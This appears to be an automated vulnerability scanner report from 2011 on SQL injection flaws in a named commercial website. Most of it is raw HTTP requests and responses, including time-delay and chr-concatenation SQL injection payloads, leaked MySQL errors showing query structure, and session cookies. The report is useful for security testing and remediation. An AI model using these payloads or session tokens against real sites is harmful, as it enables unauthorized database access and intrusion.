The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/dima00/leadflow/dima00/project.php'?ca HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=gkpk9lpg74q0r9akbiavn3mf95; JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 07:04:05 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 2182 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/leadflow/dima00/project.php'?ca' OR prj.project_page_url = 'leadflow/dima00/leadflow/dima00/project.php'?ca/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?ca' OR prj.project_page_url = 'leadflow/dima00/leadflow/dima00/project.php'?ca/' at line 5
Request 2
GET /ppc/leadflow/dima00/leadflow/dima00/project.php''?ca HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=gkpk9lpg74q0r9akbiavn3mf95; JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 07:04:06 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 124 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/leadflow/dima00/project.php'' was not found on this server.</p>
The ca parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ca parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/dima00/leadflow/dima00/project.php?ca' HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=gkpk9lpg74q0r9akbiavn3mf95; JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:54:28 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 2182 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/leadflow/dima00/project.php?ca'' OR prj.project_page_url = 'leadflow/dima00/leadflow/dima00/project.php?ca'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/dima00/leadflow/dima00/project.php?ca'/' union select prj.catId,prj.gr' at line 5
Request 2
GET /ppc/leadflow/dima00/leadflow/dima00/project.php?ca'' HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=gkpk9lpg74q0r9akbiavn3mf95; JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 06:54:32 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 122 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/leadflow/dima00/project.php was not found on this server.</p>
The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:56:23 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=qsilqc643t9jp7hs47fiuvn9v5; path=/ Content-Length: 2286 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... d = prj.groupId where prj.project_page_url = 'leadflow/dima00/leadflow/dima00/project.php?catId=1;WAITFOR'' OR prj.project_page_url = 'leadflow/dima00/leadflow/dima00/project.php?catId=1;WAITFOR'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/dima00/leadflow/dima00/project.php?catId=1;WAITFOR'/' union select prj' at line 5
The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 07:06:47 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=sq0oagedr94l7fpc1ijn6rjet3; path=/ Content-Length: 2310 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... j.groupId where prj.project_page_url = 'leadflow/dima00/leadflow/dima00/project.php?catId=80006&iusrc='' OR prj.project_page_url = 'leadflow/dima00/leadflow/dima00/project.php?catId=80006&iusrc='/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/dima00/leadflow/dima00/project.php?catId=80006&iusrc='/' union select ' at line 5
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 07:07:05 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=sp1n81495ui5q2ekn2tj635rr2; path=/ Content-Length: 122 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/leadflow/dima00/project.php was not found on this server.</p>
1.245. http://www.insideup.com/ppc/leadflow/dima00/leadflow/dima00/project.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.insideup.com
Path:
/ppc/leadflow/dima00/leadflow/dima00/project.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/dima00/leadflow/dima00/project.php?ca&1'=1 HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=gkpk9lpg74q0r9akbiavn3mf95; JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 07:00:13 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 2214 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/leadflow/dima00/project.php?ca&1'=1' OR prj.project_page_url = 'leadflow/dima00/leadflow/dima00/project.php?ca&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/dima00/leadflow/dima00/project.php?ca&1'=1' at line 5
Request 2
GET /ppc/leadflow/dima00/leadflow/dima00/project.php?ca&1''=1 HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=gkpk9lpg74q0r9akbiavn3mf95; JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 07:00:14 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 122 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/leadflow/dima00/project.php was not found on this server.</p>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow'/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:53:24 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=p4oa4vosihflapcklmtlgtgq60; path=/ Content-Length: 7542 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(' at line 5
Request 2
GET /ppc/leadflow''/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 01:53:24 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=it4melste144b75r18ct8l3ec6; path=/ Content-Length: 108 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow''/dima00/project.php was not found on this server.</p>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/dima00'/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:53:37 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=4obdi8e5fkvk91fadlcsj3vej0; path=/ Content-Length: 7542 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(' at line 5
Request 2
GET /ppc/leadflow/dima00''/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 01:53:38 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=7s5g8j996fbqv5e3cr5jtmvda0; path=/ Content-Length: 108 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00''/project.php was not found on this server.</p>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/dima00/project.php'?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:53:49 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=kcpgku846tn2o61og36v0povb1; path=/ Content-Length: 7542 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(' at line 5
Request 2
GET /ppc/leadflow/dima00/project.php''?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 01:53:49 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=ipn6ineakh35eb5dm0o8hrtm54; path=/ Content-Length: 108 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project.php'' was not found on this server.</p>
The address parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the address parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
